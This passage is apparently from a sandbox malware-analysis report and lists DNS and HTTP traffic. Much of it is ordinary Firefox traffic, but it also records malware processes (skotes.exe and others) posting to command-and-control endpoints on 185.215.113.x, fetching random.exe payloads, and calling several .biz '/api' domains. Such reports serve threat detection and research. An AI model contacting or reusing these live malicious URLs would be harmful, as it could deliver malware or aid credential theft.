                  if-none-match: W/"5388-z4f7VxffVE065aqbcDCq/QMZNSc"
                  te: trailers
                • flag-us
                  DNS
                  prod.pocket.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN A
                  Response
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN A
                  34.120.5.221
                • flag-us
                  DNS
                  prod.ads.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.ads.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.ads.prod.webservices.mozgcp.net
                  IN A
                  34.117.188.166
                • flag-us
                  DNS
                  youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube.com
                  IN AAAA
                  Response
                  youtube.com
                  IN AAAA
                  2a00:1450:4009:816::200e
                • flag-us
                  DNS
                  prod.pocket.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN AAAA
                  Response
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN AAAA
                  2600:1901:0:524c::
                • flag-us
                  DNS
                  prod.ads.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.ads.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN A
                  34.160.144.191
                • flag-us
                  DNS
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN AAAA
                  2600:1901:0:92a9::
                • flag-us
                  DNS
                  shavar.prod.mozaws.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  shavar.prod.mozaws.net
                  IN A
                  Response
                  shavar.prod.mozaws.net
                  IN A
                  52.32.237.164
                  shavar.prod.mozaws.net
                  IN A
                  52.33.23.190
                  shavar.prod.mozaws.net
                  IN A
                  44.226.106.83
                • flag-us
                  DNS
                  shavar.prod.mozaws.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  shavar.prod.mozaws.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  www.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.youtube.com
                  IN A
                  Response
                  www.youtube.com
                  IN CNAME
                  youtube-ui.l.google.com
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.78
                  youtube-ui.l.google.com
                  IN A
                  216.58.213.14
                  youtube-ui.l.google.com
                  IN A
                  216.58.201.110
                  youtube-ui.l.google.com
                  IN A
                  216.58.212.206
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.14
                  youtube-ui.l.google.com
                  IN A
                  142.250.200.46
                  youtube-ui.l.google.com
                  IN A
                  142.250.187.206
                  youtube-ui.l.google.com
                  IN A
                  172.217.16.238
                  youtube-ui.l.google.com
                  IN A
                  142.250.179.238
                  youtube-ui.l.google.com
                  IN A
                  142.250.178.14
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.46
                  youtube-ui.l.google.com
                  IN A
                  142.250.200.14
                  youtube-ui.l.google.com
                  IN A
                  142.250.180.14
                  youtube-ui.l.google.com
                  IN A
                  216.58.204.78
                  youtube-ui.l.google.com
                  IN A
                  142.250.187.238
                • flag-us
                  DNS
                  prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.149.100.209
                • flag-us
                  DNS
                  youtube-ui.l.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube-ui.l.google.com
                  IN A
                  Response
                  youtube-ui.l.google.com
                  IN A
                  142.250.178.14
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.14
                  youtube-ui.l.google.com
                  IN A
                  142.250.180.14
                  youtube-ui.l.google.com
                  IN A
                  142.250.187.206
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.78
                  youtube-ui.l.google.com
                  IN A
                  142.250.200.14
                  youtube-ui.l.google.com
                  IN A
                  216.58.204.78
                  youtube-ui.l.google.com
                  IN A
                  142.250.179.238
                  youtube-ui.l.google.com
                  IN A
                  216.58.201.110
                  youtube-ui.l.google.com
                  IN A
                  142.250.187.238
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.46
                  youtube-ui.l.google.com
                  IN A
                  172.217.16.238
                  youtube-ui.l.google.com
                  IN A
                  216.58.213.14
                  youtube-ui.l.google.com
                  IN A
                  216.58.212.206
                  youtube-ui.l.google.com
                  IN A
                  142.250.200.46
                • flag-us
                  DNS
                  prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  youtube-ui.l.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube-ui.l.google.com
                  IN AAAA
                  Response
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:819::200e
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:817::200e
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:80a::200e
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:818::200e
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-gb
                  GET
                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  firefox.exe
                  Remote address:
                  142.250.200.14:443
                  Request
                  GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                  host: consent.youtube.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  cookie: SOCS=CAAaBgiAoM66Bg
                  cookie: YSC=XAJHfiMqzLQ
                  cookie: __Secure-YEC=Cgt5cVZqVnpxYWY5NCi57c66BjIKCgJHQhIEGgAgFw%3D%3D
                  cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFw%3D%3D
                  upgrade-insecure-requests: 1
                  sec-fetch-dest: document
                  sec-fetch-mode: navigate
                  sec-fetch-site: none
                  sec-fetch-user: ?1
                  te: trailers
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN AAAA
                  Response
                  consent.youtube.com
                  IN AAAA
                  2a00:1450:4009:822::200e
                • flag-us
                  DNS
                  firefox-settings-attachments.cdn.mozilla.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  firefox-settings-attachments.cdn.mozilla.net
                  IN A
                  Response
                  firefox-settings-attachments.cdn.mozilla.net
                  IN CNAME
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.117.121.53
                • flag-us
                  DNS
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  Response
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.117.121.53
                • flag-us
                  DNS
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  www.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN A
                  Response
                  www.google.com
                  IN A
                  142.250.187.196
                • flag-gb
                  GET
                  https://www.google.com/favicon.ico
                  firefox.exe
                  Remote address:
                  142.250.187.196:443
                  Request
                  GET /favicon.ico HTTP/2.0
                  host: www.google.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: image/avif,image/webp,*/*
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  referer: https://consent.youtube.com/
                  sec-fetch-dest: image
                  sec-fetch-mode: no-cors
                  sec-fetch-site: cross-site
                  te: trailers
                • flag-us
                  DNS
                  www.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN A
                  Response
                  www.google.com
                  IN A
                  142.250.187.196
                • flag-us
                  DNS
                  www.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN AAAA
                  Response
                  www.google.com
                  IN AAAA
                  2a00:1450:4009:81f::2004
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  prod.balrog.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.balrog.prod.cloudops.mozgcp.net
                  IN A
                  Response
                  prod.balrog.prod.cloudops.mozgcp.net
                  IN A
                  35.244.181.201
                • flag-us
                  DNS
                  prod.balrog.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.balrog.prod.cloudops.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.149.100.209
                • flag-us
                  DNS
                  ciscobinary.openh264.org
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  ciscobinary.openh264.org
                  IN A
                  Response
                  ciscobinary.openh264.org
                  IN CNAME
                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                  IN CNAME
                  a17.rackcdn.com
                  a17.rackcdn.com
                  IN CNAME
                  a17.rackcdn.com.mdc.edgesuite.net
                  a17.rackcdn.com.mdc.edgesuite.net
                  IN CNAME
                  a19.dscg10.akamai.net
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.209
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.155
                • flag-gb
                  GET
                  http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                  firefox.exe
                  Remote address:
                  88.221.134.209:80
                  Request
                  GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                  Host: ciscobinary.openh264.org
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  Accept: */*
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Connection: keep-alive
                  Response
                  HTTP/1.1 200 OK
                  Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                  ETag: 85430baed3398695717b0263807cf97c
                  Content-Length: 453023
                  Accept-Ranges: bytes
                  X-Timestamp: 1731034347.00215
                  Content-Type: application/zip
                  X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                  Cache-Control: public, max-age=61851
                  Expires: Sat, 07 Dec 2024 19:56:26 GMT
                  Date: Sat, 07 Dec 2024 02:45:35 GMT
                  Connection: keep-alive
                • flag-us
                  DNS
                  a19.dscg10.akamai.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  a19.dscg10.akamai.net
                  IN A
                  Response
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.155
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.209
                • flag-us
                  DNS
                  a19.dscg10.akamai.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  a19.dscg10.akamai.net
                  IN AAAA
                  Response
                  a19.dscg10.akamai.net
                  IN AAAA
                  2a02:26f0:a1::58dd:869b
                  a19.dscg10.akamai.net
                  IN AAAA
                  2a02:26f0:a1::58dd:86d1
                • flag-us
                  DNS
                  redirector.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  redirector.gvt1.com
                  IN A
                  Response
                  redirector.gvt1.com
                  IN A
                  142.250.180.14
                • flag-us
                  DNS
                  redirector.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  redirector.gvt1.com
                  IN A
                  Response
                  redirector.gvt1.com
                  IN A
                  142.250.180.14
                • flag-us
                  DNS
                  redirector.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  redirector.gvt1.com
                  IN AAAA
                  Response
                  redirector.gvt1.com
                  IN AAAA
                  2a00:1450:4009:81e::200e
                • flag-us
                  DNS
                  r1---sn-5hnekn76.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  r1---sn-5hnekn76.gvt1.com
                  IN A
                  Response
                  r1---sn-5hnekn76.gvt1.com
                  IN CNAME
                  r1.sn-5hnekn76.gvt1.com
                  r1.sn-5hnekn76.gvt1.com
                  IN A
                  209.85.226.6
                • flag-us
                  DNS
                  r1.sn-5hnekn76.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  r1.sn-5hnekn76.gvt1.com
                  IN A
                  Response
                  r1.sn-5hnekn76.gvt1.com
                  IN A
                  209.85.226.6
                • flag-us
                  DNS
                  r1.sn-5hnekn76.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  r1.sn-5hnekn76.gvt1.com
                  IN AAAA
                  Response
                  r1.sn-5hnekn76.gvt1.com
                  IN AAAA
                  2a00:1450:400e::6
                • flag-us
                  DNS
                  play.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  play.google.com
                  IN A
                  Response
                  play.google.com
                  IN A
                  142.250.179.238
                • flag-gb
                  POST
                  https://play.google.com/log?hasfast=true&authuser=0&format=json
                  firefox.exe
                  Remote address:
                  142.250.179.238:443
                  Request
                  POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                  host: play.google.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: */*
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  referer: https://consent.youtube.com/
                  content-type: text/plain;charset=UTF-8
                  content-length: 743
                  origin: https://consent.youtube.com
                  sec-fetch-dest: empty
                  sec-fetch-mode: no-cors
                  sec-fetch-site: cross-site
                  te: trailers
                • flag-us
                  DNS
                  play.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  play.google.com
                  IN A
                  Response
                  play.google.com
                  IN A
                  142.250.179.238
                • flag-us
                  DNS
                  play.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  play.google.com
                  IN AAAA
                  Response
                  play.google.com
                  IN AAAA
                  2a00:1450:4009:81d::200e
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • 185.215.113.43:80
                  http://185.215.113.43/Zu7JuNko/index.php
                  http
                  skotes.exe
                  2.2kB
                  2.0kB
                  22
                  12

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200
                • 185.215.113.16:80
                  http://185.215.113.16/off/random.exe
                  http
                  skotes.exe
                  221.6kB
                  11.1MB
                  4448
                  7922

                  HTTP Request

                  GET http://185.215.113.16/luma/random.exe

                  HTTP Response

                  200

                  HTTP Request

                  GET http://185.215.113.16/steam/random.exe

                  HTTP Response

                  200

                  HTTP Request

                  GET http://185.215.113.16/well/random.exe

                  HTTP Response

                  200

                  HTTP Request

                  GET http://185.215.113.16/off/random.exe

                  HTTP Response

                  200
                • 104.21.16.9:443
                  https://atten-supporse.biz/api
                  tls, http
                  d1eb0cd776.exe
                  982 B
                  4.4kB
                  9
                  9

                  HTTP Request

                  POST https://atten-supporse.biz/api

                  HTTP Response

                  200
                • 172.67.162.65:443
                  https://se-blurry.biz/api
                  tls, http
                  d1eb0cd776.exe
                  977 B
                  4.3kB
                  9
                  9

                  HTTP Request

                  POST https://se-blurry.biz/api

                  HTTP Response

                  200
                • 172.67.136.167:443
                  https://zinc-sneark.biz/api
                  tls, http
                  d1eb0cd776.exe
                  1.7kB
                  9.9kB
                  14
                  16

                  HTTP Request

                  POST https://zinc-sneark.biz/api

                  HTTP Response

                  403

                  HTTP Request

                  POST https://zinc-sneark.biz/api

                  HTTP Response

                  200
                • 185.215.113.206:80
                  http://185.215.113.206/c4becf79229cb002.php
                  http
                  165fa3ed5f.exe
                  727 B
                  625 B
                  5
                  5

                  HTTP Request

                  GET http://185.215.113.206/

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.206/c4becf79229cb002.php

                  HTTP Response

                  200
                • 216.58.213.14:443
                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                  tls, http2
                  firefox.exe
                  1.9kB
                  9.0kB
                  14
                  19

                  HTTP Request

                  GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                • 34.120.5.221:443
                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  tls, http2
                  firefox.exe
                  2.0kB
                  12.9kB
                  17
                  18

                  HTTP Request

                  GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                • 172.217.169.78:443
                  www.youtube.com
                  tls
                  firefox.exe
                  977 B
                  6.9kB
                  10
                  8
                • 127.0.0.1:49278
                  firefox.exe
                • 127.0.0.1:49286
                  firefox.exe
                • 142.250.200.14:443
                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  tls, http2
                  firefox.exe
                  2.9kB
                  65.2kB
                  32
                  59

                  HTTP Request

                  GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                • 34.117.121.53:443
                  firefox-settings-attachments.cdn.mozilla.net
                  tls
                  firefox.exe
                  1.8kB
                  21.3kB
                  19
                  26
                • 142.250.187.196:443
                  https://www.google.com/favicon.ico
                  tls, http2
                  firefox.exe
                  1.8kB
                  7.5kB
                  14
                  18

                  HTTP Request

                  GET https://www.google.com/favicon.ico
                • 88.221.134.209:80
                  http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                  http
                  firefox.exe
                  5.5kB
                  467.5kB
                  114
                  349

                  HTTP Request

                  GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                  HTTP Response

                  200
                • 142.250.180.14:443
                  redirector.gvt1.com
                  tls
                  firefox.exe
                  1.6kB
                  8.9kB
                  16
                  21
                • 209.85.226.6:443
                  r1---sn-5hnekn76.gvt1.com
                  tls
                  firefox.exe
                  124.3kB
                  8.7MB
                  2288
                  6256
                • 142.250.179.238:443
                  https://play.google.com/log?hasfast=true&authuser=0&format=json
                  tls, http2
                  firefox.exe
                  2.8kB
                  8.7kB
                  18
                  20

                  HTTP Request

                  POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                • 8.8.8.8:53
                  atten-supporse.biz
                  dns
                  d1eb0cd776.exe
                  64 B
                  96 B
                  1
                  1

                  DNS Request

                  atten-supporse.biz

                  DNS Response

                  104.21.16.9
                  172.67.165.166

                • 8.8.8.8:53
                  se-blurry.biz
                  dns
                  d1eb0cd776.exe
                  59 B
                  91 B
                  1
                  1

                  DNS Request

                  se-blurry.biz

                  DNS Response

                  172.67.162.65
                  104.21.81.153

                • 8.8.8.8:53
                  zinc-sneark.biz
                  dns
                  d1eb0cd776.exe
                  61 B
                  93 B
                  1
                  1

                  DNS Request

                  zinc-sneark.biz

                  DNS Response

                  172.67.136.167
                  104.21.62.142

                • 8.8.8.8:53
                  youtube.com
                  dns
                  firefox.exe
                  57 B
                  73 B
                  1
                  1

                  DNS Request

                  youtube.com

                  DNS Response

                  216.58.213.14

                • 8.8.8.8:53
                  spocs.getpocket.com
                  dns
                  firefox.exe
                  65 B
                  131 B
                  1
                  1

                  DNS Request

                  spocs.getpocket.com

                  DNS Response

                  34.117.188.166

                • 8.8.8.8:53
                  getpocket.cdn.mozilla.net
                  dns
                  firefox.exe
                  71 B
                  174 B
                  1
                  1

                  DNS Request

                  getpocket.cdn.mozilla.net

                  DNS Response

                  34.120.5.221

                • 8.8.8.8:53
                  youtube.com
                  dns
                  firefox.exe
                  57 B
                  73 B
                  1
                  1

                  DNS Request

                  youtube.com

                  DNS Response

                  216.58.213.14

                • 8.8.8.8:53
                  prod.pocket.prod.cloudops.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  98 B
                  1
                  1

                  DNS Request

                  prod.pocket.prod.cloudops.mozgcp.net

                  DNS Response

                  34.120.5.221

                • 8.8.8.8:53
                  prod.ads.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  98 B
                  1
                  1

                  DNS Request

                  prod.ads.prod.webservices.mozgcp.net

                  DNS Response

                  34.117.188.166

                • 8.8.8.8:53
                  youtube.com
                  dns
                  firefox.exe
                  57 B
                  85 B
                  1
                  1

                  DNS Request

                  youtube.com

                  DNS Response

                  2a00:1450:4009:816::200e

                • 8.8.8.8:53
                  prod.pocket.prod.cloudops.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  110 B
                  1
                  1

                  DNS Request

                  prod.pocket.prod.cloudops.mozgcp.net

                  DNS Response

                  2600:1901:0:524c::

                • 8.8.8.8:53
                  prod.ads.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  175 B
                  1
                  1

                  DNS Request

                  prod.ads.prod.webservices.mozgcp.net

                • 8.8.8.8:53
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  103 B
                  119 B
                  1
                  1

                  DNS Request

                  prod.content-signature-chains.prod.webservices.mozgcp.net

                  DNS Response

                  34.160.144.191

                • 8.8.8.8:53
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  103 B
                  131 B
                  1
                  1

                  DNS Request

                  prod.content-signature-chains.prod.webservices.mozgcp.net

                  DNS Response

                  2600:1901:0:92a9::

                • 8.8.8.8:53
                  shavar.prod.mozaws.net
                  dns
                  firefox.exe
                  68 B
                  116 B
                  1
                  1

                  DNS Request

                  shavar.prod.mozaws.net

                  DNS Response

                  52.32.237.164
                  52.33.23.190
                  44.226.106.83

                • 8.8.8.8:53
                  shavar.prod.mozaws.net
                  dns
                  firefox.exe
                  68 B
                  153 B
                  1
                  1

                  DNS Request

                  shavar.prod.mozaws.net

                • 216.58.213.14:443
                  youtube.com
                  https
                  firefox.exe
                  3.7kB
                  11.0kB
                  10
                  14
                • 8.8.8.8:53
                  www.youtube.com
                  dns
                  firefox.exe
                  61 B
                  335 B
                  1
                  1

                  DNS Request

                  www.youtube.com

                  DNS Response

                  172.217.169.78
                  216.58.213.14
                  216.58.201.110
                  216.58.212.206
                  172.217.169.14
                  142.250.200.46
                  142.250.187.206
                  172.217.16.238
                  142.250.179.238
                  142.250.178.14
                  172.217.169.46
                  142.250.200.14
                  142.250.180.14
                  216.58.204.78
                  142.250.187.238

                • 8.8.8.8:53
                  prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  94 B
                  110 B
                  1
                  1

                  DNS Request

                  prod.remote-settings.prod.webservices.mozgcp.net

                  DNS Response

                  34.149.100.209

                • 8.8.8.8:53
                  youtube-ui.l.google.com
                  dns
                  firefox.exe
                  69 B
                  309 B
                  1
                  1

                  DNS Request

                  youtube-ui.l.google.com

                  DNS Response

                  142.250.178.14
                  172.217.169.14
                  142.250.180.14
                  142.250.187.206
                  172.217.169.78
                  142.250.200.14
                  216.58.204.78
                  142.250.179.238
                  216.58.201.110
                  142.250.187.238
                  172.217.169.46
                  172.217.16.238
                  216.58.213.14
                  216.58.212.206
                  142.250.200.46

                • 8.8.8.8:53
                  prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  94 B
                  187 B
                  1
                  1

                  DNS Request

                  prod.remote-settings.prod.webservices.mozgcp.net

                • 8.8.8.8:53
                  youtube-ui.l.google.com
                  dns
                  firefox.exe
                  69 B
                  181 B
                  1
                  1

                  DNS Request

                  youtube-ui.l.google.com

                  DNS Response

                  2a00:1450:4009:819::200e
                  2a00:1450:4009:817::200e
                  2a00:1450:4009:80a::200e
                  2a00:1450:4009:818::200e

                • 172.217.169.78:443
                  youtube-ui.l.google.com
                  https
                  firefox.exe
                  3.3kB
                  9.2kB
                  7
                  9
                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  93 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  2a00:1450:4009:822::200e

                • 8.8.8.8:53
                  firefox-settings-attachments.cdn.mozilla.net
                  dns
                  firefox.exe
                  90 B
                  177 B
                  1
                  1

                  DNS Request

                  firefox-settings-attachments.cdn.mozilla.net

                  DNS Response

                  34.117.121.53

                • 8.8.8.8:53
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  106 B
                  122 B
                  1
                  1

                  DNS Request

                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                  DNS Response

                  34.117.121.53

                • 142.250.200.14:443
                  consent.youtube.com
                  https
                  firefox.exe
                  4.0kB
                  10.6kB
                  9
                  14
                • 8.8.8.8:53
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  106 B
                  199 B
                  1
                  1

                  DNS Request

                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                • 8.8.8.8:53
                  www.google.com
                  dns
                  firefox.exe
                  60 B
                  76 B
                  1
                  1

                  DNS Request

                  www.google.com

                  DNS Response

                  142.250.187.196

                • 8.8.8.8:53
                  www.google.com
                  dns
                  firefox.exe
                  60 B
                  76 B
                  1
                  1

                  DNS Request

                  www.google.com

                  DNS Response

                  142.250.187.196

                • 8.8.8.8:53
